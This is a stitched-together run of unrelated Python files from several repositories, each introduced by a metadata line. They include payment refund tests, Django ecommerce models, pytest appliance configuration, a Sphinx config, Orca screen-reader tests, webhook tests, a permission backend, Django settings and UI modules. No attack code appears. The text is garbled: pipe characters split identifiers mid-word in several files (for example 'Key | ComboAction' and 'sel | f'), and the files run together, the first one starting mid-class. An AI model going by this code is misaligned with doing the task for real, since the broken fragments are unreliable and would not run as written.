    def test_refund(self, post_ipn):
        """A REFUND IPN matching an existing transaction id succeeds."""
        Contribution.objects.create(addon=self.addon, uuid=None,
            transaction_id=sample_purchase['tracking_id'], user=self.user)
        post_ipn.return_value = {'action': 'REFUND', 'amount': 'USD 1.00',
            'status': 'OK', 'uuid': sample_purchase['tracking_id']}
        res = self.client.post(self.url, {})
        eq_(res.content, 'Success!')
    def test_chargeback(self, post_ipn):
        """A REVERSAL (chargeback) IPN matching a transaction succeeds."""
        Contribution.objects.create(addon=self.addon, uuid=None,
            transaction_id=sample_purchase['tracking_id'], user=self.user)
        post_ipn.return_value = {'action': 'REVERSAL', 'amount': 'USD 1.00',
            'status': 'OK', 'uuid': sample_purchase['tracking_id']}
        res = self.client.post(self.url, {})
        eq_(res.content, 'Success!')
dizzy54/ecommerce | src/products/models.py | Python | mit | 5,256 | 0.000951 | from django.core.urlresolvers import reverse
from django.db import models
from django.db.models.signals import post_save
from django.utils.text import slugify
from django.utils.safestring import mark_safe
# Create your models here.
class ProductQuerySet(models.query.QuerySet):
    """QuerySet with a convenience filter for active products."""
    def active(self):
        """Restrict to products flagged ``active=True``."""
        return self.filter(active=True)
class ProductManager(models.Manager):
    """Manager whose ``all()`` hides inactive products."""
    def get_queryset(self):
        return ProductQuerySet(self.model, using=self._db)
    def all(self, *args, **kwargs):
        # NOTE: deliberately overrides Manager.all() to exclude inactive
        # products; callers needing every row must use get_queryset().
        return self.get_queryset().active()
    def get_related(self, instance):
        """Products sharing a category or default category with *instance*,
        excluding *instance* itself."""
        products_one = self.get_queryset().filter(categories__in=instance.categories.all())
        products_two = self.get_queryset().filter(default=instance.default)
        qs = (products_one | products_two).exclude(id=instance.id).distinct()
        return qs
class Product(models.Model):
    """A sellable product; per-variant pricing lives on Variation."""
    title = models.CharField(max_length=120)
    description = models.TextField(blank=True, null=True)
    price = models.DecimalField(decimal_places=2, max_digits=20)
    active = models.BooleanField(default=True)
    categories = models.ManyToManyField('Category', blank=True)
    # Primary category, used by ProductManager.get_related().
    default = models.ForeignKey('Category', related_name='default_category', null=True, blank=True)
    objects = ProductManager()
    class Meta:
        ordering = ["-title"]
    def __unicode__(self): # def __str__(self):
        return self.title
    def get_absolute_url(self):
        return reverse("product_detail", kwargs={"pk": self.pk})
    def get_image_url(self):
        """URL of the first attached image, or None when there is none."""
        img = self.productimage_set.first()
        if img:
            return img.image.url
        return img
class Variation(models.Model):
    """A purchasable variant of a Product with its own (sale) price."""
    product = models.ForeignKey(Product)
    title = models.CharField(max_length=120)
    price = models.DecimalField(decimal_places=2, max_digits=20)
    sale_price = models.DecimalField(decimal_places=2, max_digits=20, null=True, blank=True)
    active = models.BooleanField(default=True)
    inventory = models.IntegerField(null=True, blank=True) # refer none == unlimited amount
    def __unicode__(self):
        return self.title
    def get_price(self):
        """Sale price when set, otherwise the regular price."""
        if self.sale_price is not None:
            return self.sale_price
        else:
            return self.price
    def get_html_price(self):
        """Price rendered as HTML, showing original price struck when on sale.

        mark_safe is acceptable here: the interpolated values come from
        DecimalFields, not from user-supplied markup.
        """
        if self.sale_price is not None:
            html_text = "<span class='sale-price'>%s</span> <span class='og-price'>%s</span>" % \
            (self.sale_price, self.price)
        else:
            html_text = "<span class='price'>%s</span>" % (self.price)
        return mark_safe(html_text)
    def get_absolute_url(self):
        return self.product.get_absolute_url()
    def add_to_cart(self):
        """Cart URL that adds one unit of this variation."""
        return "%s?item=%s&qty=1" % (reverse("cart"), self.id)
    def remove_from_cart(self):
        """Cart URL that removes one unit of this variation."""
        return "%s?item=%s&qty=1&delete=True" % (reverse("cart"), self.id)
    def get_title(self):
        return "%s - %s" % (self.product.title, self.title)
def product_post_saved_receiver(sender, instance, created, *args, **kwargs):
    """Post-save hook: guarantee every Product owns at least one variation.

    When the freshly saved product has no variations yet, a "Default"
    variation priced at the product's own price is created for it.
    """
    saved_product = instance
    if saved_product.variation_set.all().count() == 0:
        default_variation = Variation()
        default_variation.product = saved_product
        default_variation.title = "Default"
        default_variation.price = saved_product.price
        default_variation.save()

post_save.connect(product_post_saved_receiver, sender=Product)
def image_upload_to(instance, filename):
    """Storage path for a product image: products/<slug>/<slug>-<id>.<ext>."""
    title = instance.product.title
    slug = slugify(title)
    # rpartition splits on the LAST dot, so filenames containing extra dots
    # (e.g. "my.photo.jpg") work; a bare split(".") raised ValueError on
    # the multi-element unpack for any name without exactly one dot.
    basename, _, file_extension = filename.rpartition(".")
    new_filename = "%s-%s.%s" % (slug, instance.id, file_extension)
    return "products/%s/%s" % (slug, new_filename)
class ProductImage(models.Model):
    """An image attached to a Product, stored under products/<slug>/."""
    product = models.ForeignKey(Product)
    image = models.ImageField(upload_to=image_upload_to)
    def __unicode__(self):
        return self.product.title
# Product Category
class Category(models.Model):
    """A product category, addressed by slug."""
    title = models.CharField(max_length=120, unique=True)
    slug = models.SlugField(unique=True)
    description = models.TextField(null=True, blank=True)
    active = models.BooleanField(default=True)
    timestamp = models.DateTimeField(auto_now_add=True, auto_now=False)
    def __unicode__(self):
        return self.title
    def get_absolute_url(self):
        return reverse("category_detail", kwargs={"slug": self.slug})
def image_upload_to_featured(instance, filename):
    """Storage path for a featured image: products/<slug>/featured/<slug>-<id>.<ext>."""
    title = instance.product.title
    slug = slugify(title)
    # rpartition handles filenames with any number of dots; the original
    # split(".") raised ValueError unless there was exactly one dot.
    basename, _, file_extension = filename.rpartition(".")
    new_filename = "%s-%s.%s" % (slug, instance.id, file_extension)
    return "products/%s/featured/%s" % (slug, new_filename)
class ProductFeatured(models.Model):
    """A homepage/feature banner entry wrapping a Product with display options."""
    product = models.ForeignKey(Product)
    image = models.ImageField(upload_to=image_upload_to_featured)
    title = models.CharField(max_length=120, null=True, blank=True)
    text = models.CharField(max_length=220, null=True, blank=True)
    # Layout toggles for how the banner text is rendered over the image.
    text_right = models.BooleanField(default=False)
    text_css_color = models.CharField(max_length=6, null=True, blank=True)
    show_price = models.BooleanField(default=False)
    make_image_background = models.BooleanField(default=False)
    active = models.BooleanField(default=True)
    def __unicode__(self):
        return self.product.title
|
jkandasa/integration_tests | cfme/test_framework/appliance.py | Python | gpl-2.0 | 2,985 | 0.001675 | import attr
import pytest
import warnings
from fixtures import terminalreporter
from cfme.utils import conf
from cfme.utils.path import log_path
from cfme.utils.appliance import (
load_appliances_from_config, stack,
DummyAppliance, IPAppliance,
ApplianceSummoningWarning)
warnings.simplefilter('error', ApplianceSummoningWarning)
def pytest_addoption(parser):
    """Register the dummy-appliance command line options with pytest."""
    parser.addoption('--dummy-appliance', action='store_true')
    parser.addoption('--dummy-appliance-version', default=None)
def appliances_from_cli(cli_appliances):
    """Build appliance objects from ``--appliance`` base URLs, merging in
    the applicable global settings found in conf.env."""
    appliance_config = {
        'appliances': [{'base_url': base_url} for base_url in cli_appliances]
    }
    # Grab the possible globals from the conf.env
    for key, value in conf.env.items():
        if key in IPAppliance.CONFIG_MAPPING and key not in IPAppliance.CONFIG_NONGLOBAL:
            appliance_config[key] = value
    return load_appliances_from_config(appliance_config)
@pytest.hookimpl(tryfirst=True)
def pytest_configure(config):
    """Choose the appliance(s) for this session and register the holder plugin.

    Selection priority: an appliance already on the global stack, then
    --dummy-appliance, then explicit --appliance URLs, then sprout, and
    finally the conf.env configuration.
    """
    reporter = terminalreporter.reporter()
    if stack.top:
        # Something upstream already pushed an appliance; reuse it.
        appliances = [stack.top]
    elif config.getoption('--dummy-appliance'):
        appliances = [DummyAppliance.from_config(config)]
        reporter.write_line('Retrieved Dummy Appliance', red=True)
    elif config.option.appliances:
        appliances = appliances_from_cli(config.option.appliances)
        reporter.write_line('Retrieved these appliances from the --appliance parameters', red=True)
    elif config.getoption('--use-sprout'):
        # Sprout rewrites config.option.appliances in place before we read it.
        from .sprout.plugin import mangle_in_sprout_appliances
        mangle_in_sprout_appliances(config)
        appliances = appliances_from_cli(config.option.appliances)
        reporter.write_line('Retrieved these appliances from the --sprout-* parameters', red=True)
    else:
        appliances = load_appliances_from_config(conf.env)
        reporter.write_line('Retrieved these appliances from the conf.env', red=True)
    if not stack.top:
        for appliance in appliances:
            reporter.write_line('* {!r}'.format(appliance), cyan=True)
    # The first appliance becomes the primary one for the session.
    appliance = appliances[0]
    appliance.set_session_timeout(86400)
    stack.push(appliance)
    plugin = ApplianceHolderPlugin(appliance, appliances)
    config.pluginmanager.register(plugin, "appliance-holder")
@pytest.hookimpl(trylast=True)
def pytest_unconfigure():
    """Pop the appliance that pytest_configure pushed onto the global stack."""
    stack.pop()
@attr.s(cmp=False)
class ApplianceHolderPlugin(object):
    """Pytest plugin that owns the appliance(s) selected for the session."""
    # The primary appliance; exposed to tests via the `appliance` fixture.
    held_appliance = attr.ib()
    # All appliances retrieved during configuration.
    appliances = attr.ib(default=attr.Factory(list))
    @pytest.fixture(scope="session")
    def appliance(self):
        """Session-scoped fixture returning the primary appliance."""
        return self.held_appliance
    def pytest_sessionstart(self):
        # Dummy appliances have no real version worth recording.
        if isinstance(self.held_appliance, DummyAppliance):
            return
        # Non-slave (master/standalone) processes record the appliance
        # version as a log artifact.
        if pytest.store.parallelizer_role != 'slave':
            with log_path.join('appliance_version').open('w') as appliance_version:
                appliance_version.write(self.held_appliance.version.vstring)
|
freedryk/cloudtracker | doc/conf.py | Python | bsd-2-clause | 7,125 | 0.006456 | # -*- coding: utf-8 -*-
#
# cloudtracker documentation build configuration file, created by
# sphinx-quickstart on Fri Aug 5 12:45:40 2011.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('..'))
sys.path.insert(0, os.path.abspath('../cloudtracker/'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.doctest', 'sphinx.ext.pngmath']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'cloudtracker'
copyright = u'2011, Jordan Dawe'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.0'
# The full version, including alpha/beta/rc tags.
release = '1.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit title | s (such as .. function: | :).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'cloudtrackerdoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'cloudtracker.tex', u'cloudtracker Documentation',
u'Jordan Dawe', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'cloudtracker', u'cloudtracker Documentation',
[u'Jordan Dawe'], 1)
]
|
chrys87/orca-beep | test/keystrokes/gtk3-demo/role_page_tab.py | Python | lgpl-2.1 | 1,415 | 0 | #!/usr/bin/python
"""Test of page tab output."""
from macaroon.playback import *
import utils
sequence = MacroSequence()
sequence.append(KeyComboAction("<Control>f"))
sequence.append(TypeAction("Popovers"))
sequence.append(KeyComboAction("Escape"))
sequence.append(KeyComboAction("Down"))
sequence.append(Key | ComboAction("Down"))
sequence.append(KeyComboAction("<Shift>Right"))
sequence.append(KeyComboAction("Down"))
sequence.append(KeyComboAction("Return"))
sequence.append(PauseAction(3000))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Right"))
sequence.append(utils.AssertPresentationAction(
"1. Right Arrow to the Page Setup page tab",
["BRAILLE LINE: 'gtk3-demo application Print | dialog Page Setup page tab'",
" VISIBLE: 'Page Setup page tab', cursor=1",
"SPEECH OUTPUT: 'Page Setup page tab.'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("KP_Enter"))
sequence.append(utils.AssertPresentationAction(
"2. Page Setup page tab Where Am I",
["BRAILLE LINE: 'gtk3-demo application Print dialog Page Setup page tab'",
" VISIBLE: 'Page Setup page tab', cursor=1",
"SPEECH OUTPUT: 'page tab list.'",
"SPEECH OUTPUT: 'Page Setup page tab.'",
"SPEECH OUTPUT: '2 of [0-9]'"]))
sequence.append(KeyComboAction("<Alt>F4"))
sequence.append(utils.AssertionSummaryAction())
sequence.start()
|
joealcorn/berth.cc | berth/tests/webhooks/test_github.py | Python | mit | 1,318 | 0.000759 | import json
from django.core.urlresolvers import reverse_lazy
from exam import before, after, Exam
from berth.celery import app as celery
from berth.job import tasks
from berth.project import constants
from berth.utils.test import APITestCase
noop = lambda *a, **kw: None
class TestGithubWebhook(APITestCase):
endpoint = reverse_lazy('gh-webhook')
@before
def patch_tasks(self):
self.checkout = tasks.checkout
self.commence_build = tasks.commence_build
tasks.checkout = celery.task(noop)
tasks.commence_build = celery.task(noop)
@after
def unpatch_tasks(self):
tasks.checkout = self.checkout
tasks.commence_build = self.commence_build
def test_success(sel | f):
data = json.loads(self.load_data('github/webhook.json'))
project = self.create_project(
name=data['repository']['name'],
repo_identifier=data['repository']['id'],
repo_source=constants.GITHUB,
)
resp = self.client.post(self.endpoint, data, format='json')
assert resp.status_code == 200
def test_project_nonexistant(self):
data = json.loads(self.load | _data('github/webhook.json'))
resp = self.client.post(self.endpoint, data, format='json')
assert resp.status_code == 404
|
indexofire/gork | src/gork/contrib/gauth/backends/permission_backend.py | Python | mit | 1,878 | 0.000532 | # -*- coding: utf-8 -*-
from __future__ import with_statement
from gauth.handlers import registry
__all__ = ('PermissionBackend',)
class PermissionBackend(object):
"""Authentication backend for cheking permissions
This backend is used to check permissions. The permissions
are handled with ``PermissionHandler`` which have to be registered in
``fluidpermission.handlers.registry`` before use.
``has_perm(u | ser_obj, perm, obj=None)`` method of detected model's
``PermissionHandler`` will be used to cheking process.
If no model was detected or no handler was registered, this backend
does not touch that permission and return ``None`` to pass the permission
checking process to downstream backends.
"""
supports_object_permissions = True
supports_anonymous_user = True
supports_inactive_user = True
def authenticate | (self, username, password):
"""This backend is only for checking permission"""
return None
def has_perm(self, user_obj, perm, obj=None):
"""check permission"""
# get permission handlers fot this perm
cache_name = '_%s_cache' % perm
if hasattr(self, cache_name):
handlers = getattr(self, cache_name)
else:
handlers = [h for h in registry.get_handlers() if perm in h.get_permissions()]
setattr(self, cache_name, handlers)
for handler in handlers:
if handler.has_perm(user_obj, perm, obj=obj):
return True
# do not touch this permission
return False
def has_module_perms(self, user_obj, app_label):
# get permission handlers fot this perm
handlers = registry.get_module_handlers(app_label)
for handler in handlers:
if handler.has_module_perms(user_obj, app_label):
return True
return False
|
pilhoo/EuroDriversWebSite | old/manage.py | Python | gpl-3.0 | 254 | 0 | #!/usr/bin/env python
import os
import sys
if __name__ == | "__main__":
os.environ.setdefault("DJANGO_SETTINGS | _MODULE", "EuroDrivers.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
|
julython/julython.org | july/settings.py | Python | mit | 8,557 | 0 | import os
from django.conf.global_settings import TEMPLATE_CONTEXT_PROCESSORS as TCP
from django.core.exceptions import SuspiciousOperation
# Default settings that can be overwritten in secrets
DEBUG = True
SECRET_KEY = 'foobar'
DATABASE_ENGINE = 'django.db.backends.sqlite3'
DATABASE_NAME = 'julython.db'
DATABASE_PASSWORD = ''
DATABASE_SERVER = ''
DATABASE_USER = ''
LOGFILE_PATH = os.path.expanduser('~/julython.log')
TWITTER_CONSUMER_KEY = ''
TWITTER_CONSUMER_SECRET = ''
GITHUB_CONSUMER_KEY = ''
GITHUB_CONSUMER_SECRET = ''
GITHUB_APP_ID = GITHUB_CONSUMER_KEY
GITHUB_API_SECRET = GITHUB_CONSUMER_SECRET
EMAIL_HOST = '127.0.0.1'
EMAIL_PORT = '1025'
try:
DEBUG = False
from secrets import *
except ImportError:
DEBUG = True
if DEBUG:
import warnings
warnings.filterwarnings(
'error', r"DateTimeField received a naive datetime",
RuntimeWarning, r'django\.db\.models\.fields')
CURRENT_DIR = os.path.abspath(os.path.dirname(__file__))
TEMPLATE_DEBUG = DEBUG
DEFAULT_FROM_EMAIL = 'Julython <mail@julython.org>'
SERVER_EMAIL = 'Julython <mail@julython.org>'
ADMINS = (
('Robert Myers', 'robert@julython.org'),
)
INTERNAL_IPS = ['127.0.0.1', 'localhost']
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': DATABASE_ENGINE,
'NAME': DATABASE_NAME,
'USER': DATABASE_USER,
'PASSWORD': DATABASE_PASSWORD,
'HOST': DATABASE_SERVER,
'PORT': '',
}
}
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'UTC'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# Timezone Support
USE_TZ = True
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = False
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = '/media/'
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = os.path.join(CURRENT_DIR, '..', 'static')
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
# URL prefix for admin static files -- CSS, JavaScript and images.
# Make sure to use a trailing slash.
# Examples: "http://foo.com/static/admin/", "/static/admin/".
ADMIN_MEDIA_PREFIX = '/static/admin/'
# Additional locations of static files
STATICFILES_DIRS = (
os.path.join(CURRENT_DIR, 'static'),
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'july.middleware.AbuseMiddleware',
'debug_toolbar.middleware.DebugToolbarMiddleware',
)
TEMPLATE_CONTEXT_PROCESSORS = TCP + (
'django.core.context_processors.request',
)
DEBUG_TOOLBAR_CONFIG = {
'ENABLE_STACKTRACES': True,
}
ROOT_URLCONF = 'july.urls'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates"
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
INSTALLED_APPS = (
'july',
'july.game',
'july.people',
'july.blog',
'django.contrib.auth',
'django.contrib.sessions',
'django.contrib.staticfiles',
'django.contrib.messages',
'django.contrib.admin',
'django.contrib.admindocs',
'django.contrib.contenttypes',
'debug_toolbar',
'social_auth',
'south',
)
AUTHENTICATION_BACKENDS = [
'july.auth.twitter.TwitterBackend',
'july.auth.github.GithubBackend',
'django.contrib.auth.backends.ModelBackend',
]
SESSION_ENGINE = 'django.contrib.sessions.backends.signed_cookies'
MESSAGE_STORAGE = 'django.contrib.messages.storage.session.SessionStorage'
SESSION_SAVE_EVERY_REQUEST = True
# Django 1.5 Custom User Model !! ftw
AUTH_USER_MODEL = 'july.User'
SOCIAL_AUTH_USER_MODEL = AUTH_USER_MODEL
SOCIAL_AUTH_DEFAULT_USERNAME = 'new_social_auth_user'
SOCIAL_AUTH_UUID_LENGTH = 3
SOCIAL_AUTH_PROTECTED_USER_FIELDS = ['email', 'location', 'url', 'description']
SOCIAL_AUTH_COMPLETE_URL_NAME = 'socialauth_complete'
SOCIAL_AUTH_ASSOCIATE_URL_NAME = 'socialauth_a | ssociate_complete'
SOCIAL_AUTH_PIPELINE = [
'july.auth.social.social_auth_user',
'social_auth.backends.pipeline.user.get_username',
'social_auth.backends.pipeline.user.create_user',
| 'social_auth.backends.pipeline.social.associate_user',
'social_auth.backends.pipeline.social.load_extra_data',
'social_auth.backends.pipeline.user.update_user_details',
]
# Just so we can use the same names for variables - why different social_auth??
GITHUB_APP_ID = GITHUB_CONSUMER_KEY
GITHUB_API_SECRET = GITHUB_CONSUMER_SECRET
GITHUB_EXTENDED_PERMISSIONS = ['user', 'public_repo']
TWITTER_EXTRA_DATA = [('screen_name', 'screen_name')]
ABUSE_LIMIT = 3
def skip_suspicious_ops(record):
"""Skip any errors with spoofed headers.
ticket: https://code.djangoproject.com/ticket/19866
"""
if record.exc_info:
exc_type, exc_value = record.exc_info[:2]
if isinstance(exc_value, SuspiciousOperation):
return False
return True
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'verbose': {
'format': '%(levelname)s %(asctime)s %(module)s %(message)s'
},
'simple': {
'format': '%(levelname)s %(message)s'
},
},
'filters': {
'skip_suspicious_ops': {
'()': 'django.utils.log.CallbackFilter',
'callback': skip_suspicious_ops,
},
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse',
},
'require_debug_true': {
'()': 'django.utils.log.RequireDebugTrue',
},
},
'handlers': {
'null': {
'level': 'DEBUG',
'class': 'django.utils.log.NullHandler',
},
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'simple'
},
'file': {
'level': 'INFO',
'class': 'logging.handlers.RotatingFileHandler',
'formatter': 'simple',
'maxBytes': 100000000,
'backupCount': 3,
'filename': LOGFILE_PATH,
},
'mail_admins': {
'level': 'ERROR',
'filters': ['skip_suspicious_ops', 'require_debug_false'], |
pythononwheels/copow | uimodules/copow_ui_modules.py | Python | apache-2.0 | 3,272 | 0.005501 | #
# copow ui modules.
#
# see: http://tornado.readthedocs.org/en/latest/overview.html#ui-modules
#
# remark: wheneer I say "nice" in this module it's purely subjective to me ;)
#
import tornado.web
import #A | PPNAME.config.settings
class SimplePagination(tornado.web.UIModule):
"""
| Renders a nice html selection list from
given model entries
Shows the specified model.attribute as selector.
Default is _id (Which is probably something you want to change ;)
"""
def render(self, model=None, page=None, count=None):
pages = count / atest.config.settings.pagination["per_page"]
return self.render_string(
"uimodules/simple_pagination.html", model=model, current_page=page, num_pages=num_pages)
class FormSelect(tornado.web.UIModule):
"""
Renders a nice html selection list from
given model entries
Shows the specified model.attribute as selector.
Default is _id (Which is probably something you want to change ;)
"""
def render(self, model=None, attribute="_id"):
return self.render_string(
"uimodules/form_select.html", model=model, attribute=attribute, value="")
class FormTextInput(tornado.web.UIModule):
"""
Renders a nice html textfield
Shows the specified model.attribute as selector.
Default is _id (Which is probably something you want to change ;)
"""
def render(self, model=None, attribute="_id"):
return self.render_string(
"uimodules/form_textinput.html", model=model, attribute=attribute, value="")
class FormTextArea(tornado.web.UIModule):
"""
Renders a nice html text area
Shows the specified model.attribute as selector.
Default is _id (Which is probably something you want to change ;)
"""
def render(self, model=None, attribute="_id"):
return self.render_string(
"uimodules/form_textarea.html", model=model, attribute=attribute, value="")
class FormFileSelect(tornado.web.UIModule):
"""
Renders a nice html Files selector
Shows the specified model.attribute as selector.
Default is _id (Which is probably something you want to change ;)
"""
def render(self, model=None, attribute="_id"):
return self.render_string(
"uimodules/form_fileselect.html", model=model, attribute=attribute, value="")
class FormDatePicker(tornado.web.UIModule):
"""
Renders a nice html Date picker
Shows the specified model.attribute as selector.
Default is powlib.gettime(_id) (Which is probably something you want to change ;)
"""
def render(self, model=None, attribute="_id"):
return self.render_string(
"uimodules/form_datepicker.html", model=model, attribute=attribute, value="")
class FormCheckBox(tornado.web.UIModule):
"""
Renders a nice html checkbox
Shows the specified model.attribute as selector.
Default is powlib.gettime(_id) (Which is probably something you want to change ;)
"""
def render(self, model=None, attribute="_id"):
return self.render_string(
"uimodules/form_checkbox.html", model=model, attribute=attribute, value="") |
afisher1/volttron-applications | nrel/agents/RadioThermostatDriverRelayAgent/radiothermostatdriverrelay/settings.py | Python | bsd-3-clause | 23 | 0 |
HEART | BEAT_PERIOD | = 20
|
sdss/marvin | python/marvin/web/controllers/__init__.py | Python | bsd-3-clause | 2,791 | 0.000358 | # !usr/bin/env python2
# -*- coding: utf-8 -*-
#
# Licensed under a 3-clause BSD license.
#
# @Author: Brian Cherinka
# @Date: 2016-12-08 14:24:58
# @Last modified by: Brian Cherinka
# @Last Modified time: 2018-07-13 18:21:26
from __future__ import print_function, division, absolute_import
from flask_classful import FlaskView
from flask import request, current_app, session as current_session
from marvin.web.web_utils import parseSession, update_allowed, updateGlobalSession
from marvin.web.web_utils import check_access, check_request_for_release
import marvin
from brain.utils.general import build_routemap
from marvin.api.base import arg_validate as av
class BaseWebView(FlaskView):
''' This is the Base Web View for all pages '''
def __init__(self, page):
self.base = {}
self.base['intro'] = 'Welcome to Marvin!'
self.base['version'] = marvin.__version__
self.update_title(page)
self._endpoint = self._release = None
self._drpver = self._dapver = None
def before_request(self, *args, **kwargs):
''' this runs before every single request '''
# check Flask request for release info but only when no session
if 'release' not in current_session:
check_request_for_release(request)
# check login/access status and update global session
check_ | access()
updateGlobalSession()
self.base['error'] = None
self._logged_in = current_session.get('loginre | ady', False)
self._versions = update_allowed()
self._endpoint = request.endpoint
self._drpver, self._dapver, self._release = parseSession()
# try to get a local version of the urlmap for the arg_validator
if not av.urlmap:
urlmap = build_routemap(current_app)
marvin.config.urlmap = urlmap
av.urlmap = urlmap
def after_request(self, name, response):
''' this runs after every single request '''
return response
def update_title(self, page):
''' Update the title and page '''
self.base['title'] = page.title().split('-')[0] if 'main' in page \
else page.title().replace('-', ' | ')
self.base['page'] = page
def reset_dict(self, mydict, exclude=None):
